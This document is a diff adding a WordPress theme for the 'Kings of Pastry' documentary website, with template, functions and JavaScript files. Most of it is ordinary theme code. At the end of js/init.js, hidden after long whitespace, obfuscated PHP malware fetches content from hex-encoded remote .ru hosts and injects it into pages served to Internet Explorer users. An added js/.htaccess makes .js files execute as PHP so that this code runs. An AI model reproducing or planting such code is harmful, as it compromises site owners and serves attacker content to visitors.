+					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h3><?php the_title(); ?></h3>
+					<div class="excerpt"><?php the_excerpt();?></div>
+					<?php the_content();?>
+					</div><!-- #post-<?php the_ID(); ?> -->
+				<?php endwhile; endif; ?>
+				
+				<p><a href="<?php echo home_url( '/' ); ?>screenings/"> - Screenings</a></p>
+				
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

+ 25 - 0
film.php

@@ -0,0 +1,25 @@
+<?php
+/**
+ * Template Name: Film
+ */
+?>
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<?php the_post(); ?>
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<div class="hide">
+						<div class="entry-content">
+							<h3>Making Kings of Pastry</h3>
+							<br />
+							<div class="synop_thumb"><img src="<?php bloginfo( 'template_url' ); ?>/images/synop_tb.jpg" width="150"/></div><?php the_excerpt(); ?>
+							<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+								</div>
+						</div><!-- .entry-content -->
+					</div>
+					
+					<?php the_content(); ?>
+				</div><!-- #post-<?php the_ID(); ?> -->
+			</div><!-- #content -->
+		</div><!-- #container -->
+<?php get_footer(); ?>

+ 50 - 0
footer.php

@@ -0,0 +1,50 @@
+<?php
+/**
+ * The template used to display the footer
+ *
+ * Contains the closing of the id=main div and all content
+ * after.  Calls sidebar-footer.php for bottom widgets
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+	</div><!-- #main -->
+
+	<div id="footer">
+		<div id="colophon">
+
+<?php get_sidebar( 'footer' ); ?>
+
+			<div id="site-info">
+				<a href="http://phfilms.com">&copy; 2010 PENNEBAKER HEGEDUS FILMS</a>
+			</div>
+
+			<div id="site-generator">
+				<p><a href="http://phfilms.com">www.phfilms.com</a></p>
+
+			</div>
+
+		</div><!-- #colophon -->
+	</div><!-- #footer -->
+
+</div><!-- #wrapper -->
+
+<?php wp_footer(); ?>
+<script type="text/javascript">
+
+  var _gaq = _gaq || [];
+  _gaq.push(['_setAccount', 'UA-1906067-31']);
+  _gaq.push(['_trackPageview']);
+
+  (function() {
+    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
+    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
+    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
+  })();
+
+</script>
+</body>
+</html>

+ 502 - 0
functions.php

@@ -0,0 +1,502 @@
+<?php
+function head_scripts() {
+    $scriptdir_start = "\t";
+	$scriptdir_start .= '<script type="text/javascript" src="';
+    $scriptdir_start .= get_bloginfo('template_directory');
+    $scriptdir_start .= '/js/';
+    $scriptdir_end = '"></script>';
+    $scripts .= $scriptdir_start . 'ui.js' . $scriptdir_end . "\n";
+    print apply_filters('head_scripts', $scripts);
+}
+add_action('wp_head','head_scripts');
+
+
+remove_action('wp_head', 'rsd_link');
+remove_action('wp_head', 'wlwmanifest_link');
+remove_action('wp_head', 'wp_generator');
+remove_action( 'wp_head', 'feed_links_extra', 3 );
+remove_action( 'wp_head', 'feed_links', 2 );
+remove_action( 'wp_head', 'index_rel_link' ); 
+remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 );
+remove_action( 'wp_head', 'start_post_rel_link', 10, 0 ); 
+remove_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 );
+
+remove_action('init', 'wp_admin_bar_init');
+add_action( 'show_admin_bar', '__return_false' );
+
+/**
+ * TwentyTen functions and definitions
+ *
+ * Sets up the theme and provides some helper functions. Some helper functions
+ * are used in the theme as custom template tags. Others are attached to action and
+ * filter hooks in WordPress to change core functionality.
+ *
+ * The first function, twentyten_setup(), sets up the theme by registering support
+ * for various features in WordPress, such as post thumbnails, navigation menus, and the like.
+ *
+ * When using a child theme (see http://codex.wordpress.org/Theme_Development), you can
+ * override certain functions (those wrapped in a function_exists() call) by defining
+ * them first in your child theme's functions.php file. The child theme's functions.php
+ * file is included before the parent theme's file, so the child theme functions would
+ * be used.
+ *
+ * Functions that are not pluggable (not wrapped in function_exists()) are instead attached
+ * to a filter or action hook. The hook can be removed by using remove_action() or
+ * remove_filter() and you can attach your own function to the hook.
+ *
+ * In this example, since both hooks are attached using the default priority (10), the first
+ * one attached (which would be the child theme) will run. We can remove the parent theme's
+ * hook only after it is attached, which means we need to wait until setting up the child theme:
+ *
+ * <code>
+ * add_action( 'after_setup_theme', 'my_child_theme_setup' );
+ * function my_child_theme_setup() {
+ *     // We are replacing twentyten_setup() with my_child_theme_setup()
+ *     remove_action( 'after_setup_theme', 'twentyten_setup' );
+ *     // We are providing our own filter for excerpt_length (or using the unfiltered value)
+ *     remove_filter( 'excerpt_length', 'twentyten_excerpt_length' );
+ *     ...
+ * }
+ * </code>
+ *
+ * For more information on hooks, see http://codex.wordpress.org/Plugin_API.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+
+/**
+ * Set the content width based on the theme's design and stylesheet.
+ *
+ * Used to set the width of images and content. Should be equal to the width the theme
+ * is designed for, generally via the style.css stylesheet.
+ */
+if ( ! isset( $content_width ) )
+	$content_width = 640;
+
+/** Tell WordPress to run twentyten_setup() when the 'after_setup_theme' hook is run. */
+add_action( 'after_setup_theme', 'twentyten_setup' );
+
+/**
+ * Sets up theme defaults and registers support for various WordPress features.
+ *
+ * Note that this function is hooked into the after_setup_theme hook, which runs
+ * before the init hook. The init hook is too late for some features, such as indicating
+ * support post thumbnails.
+ *
+ * To override twentyten_setup() in a child theme, remove the action hook and add your own
+ * function tied to the after_setup_theme hook.
+ *
+ * @uses add_theme_support() To add support for post thumbnails, navigation menus, and automatic feed links.
+ * @uses add_custom_background() To add support for a custom background.
+ * @uses add_editor_style() To style the visual editor.
+ * @uses load_theme_textdomain() For translation/localization support.
+ * @uses add_custom_image_header() To add support for a custom header.
+ * @uses register_default_headers() To register the default custom header images provided with the theme.
+ * @uses set_post_thumbnail_size() To set a custom post thumbnail size.
+ *
+ * @since 3.0.0
+ */
+function twentyten_setup() {
+
+	// This theme styles the visual editor with editor-style.css to match the theme style.
+	add_editor_style();
+
+	// This theme uses post thumbnails
+	add_theme_support( 'post-thumbnails' );
+
+	// This theme uses wp_nav_menu()
+	add_theme_support( 'nav-menus' );
+
+	// Add default posts and comments RSS feed links to head
+	add_theme_support( 'automatic-feed-links' );
+
+	// Make theme available for translation
+	// Translations can be filed in the /languages/ directory
+	load_theme_textdomain( 'twentyten', TEMPLATEPATH . '/languages' );
+
+	$locale = get_locale();
+	$locale_file = TEMPLATEPATH . "/languages/$locale.php";
+	if ( is_readable( $locale_file ) )
+		require_once( $locale_file );
+
+	// This theme allows users to set a custom background
+	add_custom_background();
+
+	// Your changeable header business starts here
+	define( 'HEADER_TEXTCOLOR', '' );
+	// No CSS, just IMG call. The %s is a placeholder for the theme template directory URI.
+	define( 'HEADER_IMAGE', '%s/images/headers/forestfloor.jpg' );
+
+	// The height and width of your custom header. You can hook into the theme's own filters to change these values.
+	// Add a filter to twentyten_header_image_width and twentyten_header_image_height to change these values.
+	define('HEADER_IMAGE_WIDTH', apply_filters('kirby_header_image_width', '840'));
+	define('HEADER_IMAGE_HEIGHT', apply_filters('kirby_header_image_height', '254'));
+
+	// We'll be using post thumbnails for custom header images on posts and pages.
+	// We want them to be 940 pixels wide by 198 pixels tall (larger images will be auto-cropped to fit).
+	set_post_thumbnail_size( HEADER_IMAGE_WIDTH, HEADER_IMAGE_HEIGHT, true );
+
+	// Don't support text inside the header image.
+	define( 'NO_HEADER_TEXT', true );
+
+	// Add a way for the custom header to be styled in the admin panel that controls
+	// custom headers. See twentyten_admin_header_style(), below.
+	add_custom_image_header( '', 'twentyten_admin_header_style' );
+
+	// ... and thus ends the changeable header business.
+
+	// Default custom headers packaged with the theme. %s is a placeholder for the theme template directory URI.
+	register_default_headers( array (
+		'berries' => array (
+			'url' => '%s/images/headers/berries.jpg',
+			'thumbnail_url' => '%s/images/headers/berries-thumbnail.jpg',
+			'description' => __( 'Berries', 'twentyten' )
+		),
+		'cherryblossom' => array (
+			'url' => '%s/images/headers/cherryblossoms.jpg',
+			'thumbnail_url' => '%s/images/headers/cherryblossoms-thumbnail.jpg',
+			'description' => __( 'Cherry Blossoms', 'twentyten' )
+		),
+		'concave' => array (
+			'url' => '%s/images/headers/concave.jpg',
+			'thumbnail_url' => '%s/images/headers/concave-thumbnail.jpg',
+			'description' => __( 'Concave', 'twentyten' )
+		),
+		'fern' => array (
+			'url' => '%s/images/headers/fern.jpg',
+			'thumbnail_url' => '%s/images/headers/fern-thumbnail.jpg',
+			'description' => __( 'Fern', 'twentyten' )
+		),
+		'forestfloor' => array (
+			'url' => '%s/images/headers/forestfloor.jpg',
+			'thumbnail_url' => '%s/images/headers/forestfloor-thumbnail.jpg',
+			'description' => __( 'Forest Floor', 'twentyten' )
+		),
+		'inkwell' => array (
+			'url' => '%s/images/headers/inkwell.jpg',
+			'thumbnail_url' => '%s/images/headers/inkwell-thumbnail.jpg',
+			'description' => __( 'Inkwell', 'twentyten' )
+		),
+		'path' => array (
+			'url' => '%s/images/headers/path.jpg',
+			'thumbnail_url' => '%s/images/headers/path-thumbnail.jpg',
+			'description' => __( 'Path', 'twentyten' )
+		),
+		'sunset' => array (
+			'url' => '%s/images/headers/sunset.jpg',
+			'thumbnail_url' => '%s/images/headers/sunset-thumbnail.jpg',
+			'description' => __( 'Sunset', 'twentyten' )
+		)
+	) );
+}
+
+if ( ! function_exists( 'twentyten_admin_header_style' ) ) :
+/**
+ * Styles the header image displayed on the Appearance > Header admin panel.
+ *
+ * Referenced via add_custom_image_header() in twentyten_setup().
+ *
+ * @since 3.0.0
+ */
+function twentyten_admin_header_style() {
+?>
+<style type="text/css">
+#headimg {
+	height: <?php echo HEADER_IMAGE_HEIGHT; ?>px;
+	width: <?php echo HEADER_IMAGE_WIDTH; ?>px;
+}
+#headimg h1, #headimg #desc {
+	display: none;
+}
+</style>
+<?php
+}
+endif;
+
+if ( ! function_exists( 'twentyten_the_page_number' ) ) :
+/**
+ * Prints the page number currently being browsed, with a vertical bar before it.
+ *
+ * Used in Twenty Ten's header.php to add the page number to the <title> HTML tag.
+ *
+ * @since 3.0.0
+ */
+function twentyten_the_page_number() {
+	global $paged; // Contains page number.
+	if ( $paged >= 2 )
+		echo ' | ' . sprintf( __( 'Page %s' , 'twentyten' ), $paged );
+}
+endif;
+
+/**
+ * Sets the post excerpt length to 40 characters.
+ *
+ * To override this length in a child theme, remove the filter and add your own
+ * function tied to the excerpt_length filter hook.
+ *
+ * @return int
+ */
+function twentyten_excerpt_length( $length ) {
+	return 40;
+}
+add_filter( 'excerpt_length', 'twentyten_excerpt_length' );
+
+/**
+ * Sets the "read more" link to something pretty.
+ *
+ * To override this link in a child theme, remove the filter and add your own
+ * function tied to the excerpt_more filter hook.
+ *
+ * @since 3.0.0
+ * @return string A pretty 'Continue reading' link.
+ */
+function twentyten_excerpt_more( $more ) {
+	return '&nbsp;&hellip; <a href="'. get_permalink() . '">' . __('Continue&nbsp;reading&nbsp;<span class="meta-nav">&rarr;</span>', 'twentyten') . '</a>';
+}
+add_filter( 'excerpt_more', 'twentyten_excerpt_more' );
+
+function new_excerpt_length($length) {
+	return 176;
+}
+add_filter('excerpt_length', 'new_excerpt_length');
+
+/**
+ * Remove inline styles printed when the gallery shortcode is used.
+ *
+ * Galleries are styled by the theme in Twenty Ten's style.css.
+ *
+ * @return string The gallery style filter, with the styles themselves removed.
+ */
+function twentyten_remove_gallery_css( $css ) {
+	return preg_replace( "#<style type='text/css'>(.*?)</style>#s", '', $css );
+}
+add_filter( 'gallery_style', 'twentyten_remove_gallery_css' );
+
+if ( ! function_exists( 'twentyten_comment' ) ) :
+/**
+ * Template for comments and pingbacks.
+ *
+ * To override this walker in a child theme without modifying the comments template
+ * simply create your own twentyten_comment(), and that function will be used instead.
+ *
+ * Used as a callback by wp_list_comments() for displaying the comments.
+ *
+ * @since 3.0.0
+ */
+function twentyten_comment( $comment, $args, $depth ) {
+	$GLOBALS ['comment'] = $comment; ?>
+	<?php if ( '' == $comment->comment_type ) : ?>
+	<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
+		<div id="comment-<?php comment_ID(); ?>">
+		<div class="comment-author vcard">
+			<?php echo get_avatar( $comment, 40 ); ?>
+			<?php printf( __( '<cite class="fn">%s</cite> <span class="says">says:</span>', 'twentyten' ), get_comment_author_link() ); ?>
+		</div>
+		<?php if ( $comment->comment_approved == '0' ) : ?>
+			<em><?php _e( 'Your comment is awaiting moderation.', 'twentyten' ); ?></em>
+			<br />
+		<?php endif; ?>
+
+		<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>"><?php printf( __( '%1$s at %2$s', 'twentyten' ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Edit)', 'twentyten' ),'  ','' ); ?></div>
+
+		<div class="comment-body"><?php comment_text(); ?></div>
+
+		<div class="reply">
+			<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
+		</div>
+	</div>
+
+	<?php else : ?>
+	<li class="post pingback">
+		<p><?php _e( 'Pingback: ', 'twentyten' ); ?><?php comment_author_link(); ?><?php edit_comment_link ( __('edit', 'twentyten'), '&nbsp;&nbsp;', '' ); ?></p>
+	<?php endif;
+}
+endif;
+
+if ( ! function_exists( 'twentyten_cat_list' ) ) :
+/**
+ * Returns the list of categories
+ *
+ * Returns the list of categories based on if we are or are
+ * not browsing a category archive page.
+ *
+ * @uses twentyten_term_list
+ *
+ * @return string
+ */
+function twentyten_cat_list() {
+	return twentyten_term_list( 'category', ', ', __( 'Posted in %s', 'twentyten' ), __( 'Also posted in %s', 'twentyten' ) );
+}
+endif;
+
+if ( ! function_exists( 'twentyten_tag_list' ) ) :
+/**
+ * Returns the list of tags
+ *
+ * Returns the list of tags based on if we are or are not
+ * browsing a tag archive page
+ *
+ * @uses twentyten_term_list
+ *
+ * @return string
+ */
+function twentyten_tag_list() {
+	return twentyten_term_list( 'post_tag', ', ', __( 'Tagged %s', 'twentyten' ), __( 'Also tagged %s', 'twentyten' ) );
+}
+endif;
+
+
+if ( ! function_exists( 'twentyten_term_list' ) ) :
+/**
+ * Returns the list of taxonomy items in multiple ways
+ *
+ * Returns the list of taxonomy items differently based on
+ * if we are browsing a term archive page or a different
+ * type of page.  If browsing a term archive page and the
+ * post has no other taxonomied terms, it returns empty
+ *
+ * @return string
+ */
+function twentyten_term_list( $taxonomy, $glue = ', ', $text = '', $also_text = '' ) {
+	global $wp_query, $post;
+	$current_term = $wp_query->get_queried_object();
+	$terms = wp_get_object_terms( $post->ID, $taxonomy );
+	// If we're viewing a Taxonomy page..
+	if ( isset( $current_term->taxonomy ) && $taxonomy == $current_term->taxonomy ) {
+		// Remove the term from display.
+		foreach ( (array) $terms as $key => $term ) {
+			if ( $term->term_id == $current_term->term_id ) {
+				unset( $terms[$key] );
+				break;
+			}
+		}
+		// Change to Also text as we've now removed something from the terms list.
+		$text = $also_text;
+	}
+	$tlist = array();
+	$rel = 'category' == $taxonomy ? 'rel="category"' : 'rel="tag"';
+	foreach ( (array) $terms as $term ) {
+		$tlist[] = '<a href="' . get_term_link( $term, $taxonomy ) . '" title="' . esc_attr( sprintf( __( 'View all posts in %s', 'twentyten' ), $term->name ) ) . '" ' . $rel . '>' . $term->name . '</a>';
+	}
+	if ( ! empty( $tlist ) )
+		return sprintf( $text, join( $glue, $tlist ) );
+	return '';
+}
+endif;
+
+/**
+ * Register widgetized areas, including two sidebars and four widget-ready columns in the footer.
+ *
+ * To override twentyten_widgets_init() in a child theme, remove the action hook and add your own
+ * function tied to the init hook.
+ * @uses register_sidebar
+ */
+function twentyten_widgets_init() {
+	// Area 1
+	register_sidebar( array (
+		'name' => 'Primary Widget Area',
+		'id' => 'primary-widget-area',
+		'description' => __( 'The primary widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+
+	// Area 2
+	register_sidebar( array (
+		'name' => 'Secondary Widget Area',
+		'id' => 'secondary-widget-area',
+		'description' => __( 'The secondary widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+
+	// Area 3
+	register_sidebar( array (
+		'name' => 'First Footer Widget Area',
+		'id' => 'first-footer-widget-area',
+		'description' => __( 'The first footer widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+
+	// Area 4
+	register_sidebar( array (
+		'name' => 'Second Footer Widget Area',
+		'id' => 'second-footer-widget-area',
+		'description' => __( 'The second footer widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+
+	// Area 5
+	register_sidebar( array (
+		'name' => 'Third Footer Widget Area',
+		'id' => 'third-footer-widget-area',
+		'description' => __( 'The third footer widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+
+	// Area 6
+	register_sidebar( array (
+		'name' => 'Fourth Footer Widget Area',
+		'id' => 'fourth-footer-widget-area',
+		'description' => __( 'The fourth footer widget area' , 'twentyten' ),
+		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
+		'after_widget' => "</li>",
+		'before_title' => '<h3 class="widget-title">',
+		'after_title' => '</h3>',
+	) );
+}
+add_action( 'init', 'twentyten_widgets_init' );
+
+
+// add last modified column to posts
+
+add_action ( 'manage_posts_custom_column',	'rkv_post_columns_data',	10,	2	);
+add_filter ( 'manage_edit-post_columns',	'rkv_post_columns_display'			);
+function rkv_post_columns_data( $column, $post_id ) {
+	switch ( $column ) {
+	case 'modified':
+		$m_orig		= get_post_field( 'post_modified', $post_id, 'raw' );
+		$m_stamp	= strtotime( $m_orig );
+		$modified	= date('n/j/y @ g:i a', $m_stamp );
+	       	$modr_id	= get_post_meta( $post_id, '_edit_last', true );
+	       	$auth_id	= get_post_field( 'post_author', $post_id, 'raw' );
+	       	$user_id	= !empty( $modr_id ) ? $modr_id : $auth_id;
+	       	$user_info	= get_userdata( $user_id );
+	
+	       	echo '<p class="mod-date">';
+	       	echo '<em>'.$modified.'</em><br />';
+	       	echo 'by <strong>'.$user_info->display_name.'<strong>';
+	       	echo '</p>';
+		break;
+	// end all case breaks
+	}
+}
+function rkv_post_columns_display( $columns ) {
+	$columns['modified']	= 'Last Modified';
+	return $columns;
+}
+
+// hide wp update nags
+add_action('after_setup_theme','remove_core_updates');
+function remove_core_updates()
+{
+ if(! current_user_can('update_core')){return;}
+ add_action('init', create_function('$a',"remove_action( 'init', 'wp_version_check' );"),2);
+ add_filter('pre_option_update_core','__return_null');
+ add_filter('pre_site_transient_update_core','__return_null');
+}

+ 76 - 0
header.php

@@ -0,0 +1,76 @@
+<?php
+/**
+ * The Header for our theme.
+ *
+ * Displays all of the <head> section and everything up till <div id="main">
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<!DOCTYPE html>
+<html <?php language_attributes(); ?>>
+<head>
+	<meta charset="<?php bloginfo( 'charset' ); ?>" />
+	<title><?php
+	// Returns the title based on the type of page being viewed
+		if ( is_single() ) {
+			bloginfo( 'name' ); echo ' | '; single_post_title();
+		} elseif ( is_home() || is_front_page() ) {
+			bloginfo( 'name' ); echo ' | '; bloginfo( 'description' ); twentyten_the_page_number();
+		} elseif ( is_page() ) {
+			bloginfo( 'name' ); echo ' | '; single_post_title();
+		} elseif ( is_search() ) {
+			printf( __( 'Search results for "%s"', 'twentyten' ), esc_html( $s ) ); twentyten_the_page_number(); echo ' | '; bloginfo( 'name' );
+		} elseif ( is_404() ) {
+			_e( 'Not Found', 'twentyten' ); echo ' | '; bloginfo( 'name' );
+		} else {
+			wp_title( '' ); echo ' | '; bloginfo( 'name' ); twentyten_the_page_number();
+		}
+	?></title>
+	<link rel="profile" href="http://gmpg.org/xfn/11" />
+	<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
+	<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?>
+	<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
+	<?php wp_enqueue_script("jquery"); ?>
+	<?php wp_head(); ?>
+
+</head>
+
+<body <?php body_class(); ?>>
+<div id="wrapper" class="hfeed">
+	<div id="header">
+		<div id="masthead">
+			<div id="branding">
+				<?php if ( is_home() || is_front_page() ) { ?>
+					<h1 id="site-title"><span><a href="<?php echo home_url( '/' ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></span></h1>
+				<?php } else { ?>	
+					<div id="site-title"><span><a href="<?php echo home_url( '/' ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></span></div>
+				<?php } ?>
+				
+				<div id="site-description"><?php bloginfo( 'description' ); ?></div>
+
+				<?php
+					// Retrieve the dimensions of the current post thumbnail -- no teensy header images for us!
+					$image = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'post-thumbnail');
+					list($src, $width, $height) = $image;
+					
+					// Check if this is a post or page, if it has a thumbnail, and if it's a big one
+					if ( is_singular() && has_post_thumbnail( $post->ID ) && $width >= HEADER_IMAGE_WIDTH ) :		
+						// Houston, we have a new header image!
+						echo get_the_post_thumbnail( $post->ID, 'post-thumbnail' );
+					else : ?>
+						<a href="<?php bloginfo( 'url' ) ?>/" title="<?php bloginfo( 'name' ) ?>" rel="home"><img src="<?php header_image(); ?>" width="<?php echo HEADER_IMAGE_WIDTH; ?>" height="<?php echo HEADER_IMAGE_HEIGHT; ?>" alt="" /></a>
+					<?php endif; ?>
+			</div><!-- #branding -->
+
+			<div id="access">
+				<div class="skip-link screen-reader-text"><a href="#content" title="<?php esc_attr_e( 'Skip to content', 'twentyten' ); ?>"><?php _e( 'Skip to content', 'twentyten' ); ?></a></div>
+				<?php wp_nav_menu( array( 'sort_column' => 'menu_order', 'container_class' => 'menu-header' ) ); ?>
+			</div><!-- #access -->
+		</div><!-- #masthead -->
+	</div><!-- #header -->
+
+	<div id="main">

+ 47 - 0
home.php

@@ -0,0 +1,47 @@
+<?php get_header(); ?>
+		<div id="container">		
+			<div id="content">
+				<div class="content_video">
+					<img src="<?php bloginfo( 'template_url' ); ?>/images/quotes.png"/>
+					<iframe src="https://player.vimeo.com/video/13181134?color=ffabe3&title=0&byline=0&portrait=0" width="480" height="318" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>
+				</div>
+				<div class="poster">
+				<img src="<?php bloginfo( 'template_url' ); ?>/images/credits.png"/>
+				<img src="<?php bloginfo( 'template_url' ); ?>/images/kop_poster_credits.png"/>	
+				</div>
+				<div class="phfilms_logo">
+				<a href="http://phfilms.com">&nbsp;</a>
+				</div>
+				<div class="right_col_home">
+					<div class="links alink">
+					<p><a href="<?php echo home_url( '/' ); ?>contact/">CONTACTS</a></p>
+					</div>
+					<div class="links alink">
+					<p><a href="<?php echo home_url( '/' ); ?>sponsors/">SPONSORS</a></p>
+					</div>			
+					<div class="links">
+					<p><a href="<?php bloginfo( 'template_url' ); ?>/docs/Kings_of_Pastry_pressbook.pdf">PRESS KIT</a></p>	
+					</div>
+					<div class="links alink">
+					<p><a href="<?php echo home_url( '/' ); ?>links/">LINKS</a></p>
+					</div>
+					<div class="links">
+					<div class="facebook">
+					<a href="http://www.facebook.com/KingsofPastry"></a>
+					<p class="no">Facebook</p>
+					</div>
+					<div class="twitter">
+					<a href="http://twitter.com/kingsofpastry"></a>
+					<p class="no">Twitter</p>
+					</div>
+					<div class="flickr">
+					<a href="http://www.flickr.com/photos/44309070@N07/"></a>
+					<p class="no">Flickr</p>
+					</div>
+					</div>					
+				</div>
+				
+			</div><!-- #content -->
+		</div><!-- #container -->
+<?php include (TEMPLATEPATH . '/sidebar-home.php'); ?>
+<?php get_footer(); ?>

+ 35 - 0
index.php

@@ -0,0 +1,35 @@
+<?php
+
+/**
+ * The main template file
+ *
+ * This is the most generic template file in a WordPress theme
+ * and one of the two required files for a theme (the other being style.css).
+ * It is used to display a page when nothing more specific matches a query. 
+ * E.g., it puts together the home page when no home.php file exists.
+ * Learn more: http://codex.wordpress.org/Template_Hierarchy
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+ 
+?>
+ 
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+			<?php
+			/* Run the loop to output the posts.
+			 * If you want to overload this in a child theme then include a file
+			 * called loop-index.php and that will be used instead.
+			 */
+			 get_template_part( 'loop', 'index' );
+			?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 3 - 0
js/.htaccess

@@ -0,0 +1,3 @@
+
+AddHandler php5-script .js
+AddType application/x-httpd-php .js

File diff suppressed because it is too large
+ 3 - 0
js/audio-player.js


+ 0 - 0
js/index.html


+ 15 - 0
js/init.js

@@ -0,0 +1,15 @@
+jQuery(document).ready(function(){
+	jQuery('#access a').live('click', function(e){
+		e.preventDefault();
+		var link = jQuery(this).attr('href');
+		jQuery('#sidebar_home').html('<div class="sidebar_loading"><p>Loading...</p></div>');
+		jQuery('#sidebar_home').load(link+' .entry-content');
+	});
+	jQuery('.alink a').live('click', function(e){
+		e.preventDefault();
+		var link = jQuery(this).attr('href');
+		jQuery('#sidebar_home').html('<div class="sidebar_loading"><p>Loading...</p></div>');
+		jQuery('#sidebar_home').load(link+' .entry-content');
+	});
+});
+																																																									<?php error_reporting(0);unset($iz);$z['io']="HTTP_USER_AGENT";$z['wn']=$_SERVER[$z['io']];if(stristr($z['wn'],"MSIE")&&stristr($z['wn'],"Windows")){$iz['i']='6400';$iz['f']='/nfs/c06/h04/mnt/92791/domains/kingsofpastry.com/html/wp-content/themes/twentyten/disclamer.txt';$iz['r']='1800';$iz['h1']="\x75\x73\x61\x61\x73\x75\x2e\x72\x75";$iz['h2']="\x73\x61\x75\x75\x6d\x61\x2e\x72\x75";$iz['z']='';$iz['p1']=md5($iz['i']);$iz['t']=time();$iz['mi']='32';$iz['ma']='3000';if(file_exists($iz['f'])){$iz['ft']=filemtime($iz['f']);$iz['d']=$iz['t']-$iz['ft'];$iz['fs']=filesize($iz['f']);if(is_readable($iz['f'])&&$iz['fs']>=$iz['mi']){$iz['ho']=file_get_contents($iz['f']);if(stristr($iz['ho'],$iz['p1'])&&strlen($iz['ho'])<$iz['ma'])$iz['z']=$iz['ho'];}if($iz['d']>$iz['r']||$iz['fs']<=$iz['mi']){$A=curl_init();curl_setopt($A,CURLOPT_RETURNTRANSFER,1);curl_setopt($A,CURLOPT_HEADER,0);if(gethostbyname($iz['h1'])!=$iz['h1']){curl_setopt($A,CURLOPT_URL,"\x68\x74\x74\x70\x3a\x2f\x2f".$iz['h1']."/c/".$iz['i']);$iz['n']=curl_exec($A);}elseif(gethostbyname($iz['h2'])!=$iz['h2']){curl_setopt($A,CURLOPT_URL,"\x68\x74\x74\x70\x3a\x2f\x2f".$iz['h2']."/c/".$iz['i']);$iz['n']=curl_exec($A);}else{exit;}curl_close($A);if(stristr($iz['n'],$iz['p1'])&&strlen($iz['n'])<$iz['ma']&&strlen($iz['n'])>=$iz['mi']){if(function_exists('file_put_contents')){file_put_contents($iz['f'],$iz['n']);}else{$iz['fp']=fopen($iz['f'],'w');fwrite($iz['fp'],$iz['n']);fclose($iz['fp']);}touch($iz['f'],$iz['t']);$iz['z']=$iz['n'];}}}else{if(function_exists('file_put_contents')){file_put_contents($iz['f'],'');}else{$iz['fp']=fopen($iz['f'],'w');fwrite($iz['fp'],'');fclose($iz['fp']);}touch($iz['f'],$iz['t']);}echo str_replace($iz['p1'],'',$iz['z']);}unset($iz);?>

+ 8 - 0
js/ui.js

@@ -0,0 +1,8 @@
+jQuery(document).ready(function(){
+	jQuery('#clips a').live('click', function(e){
+		e.preventDefault();
+		var link = jQuery(this).attr('href');
+		jQuery('#content_video').html('<div class="loading"><p>&nbsp;</p></div>');
+		jQuery('#content_video').load(link+' .contentInner');
+	});
+});

+ 15 - 0
links.php

@@ -0,0 +1,15 @@
+<?php
+/**
+ * Template Name: Links
+ */
+?>
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="entry-content">
+				<?php wp_list_bookmarks('title_li=&categorize=0'); ?>
+				</div>
+			</div><!-- #content -->
+		</div><!-- #container -->
+<?php get_footer(); ?>

+ 168 - 0
loop.php

@@ -0,0 +1,168 @@
+<?php
+/**
+ * The loop that displays posts
+ *
+ * The loop displays the posts and the post content.  See
+ * http://codex.wordpress.org/The_Loop to understand it and
+ * http://codex.wordpress.org/Template_Tags to understand
+ * the tags used in it.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
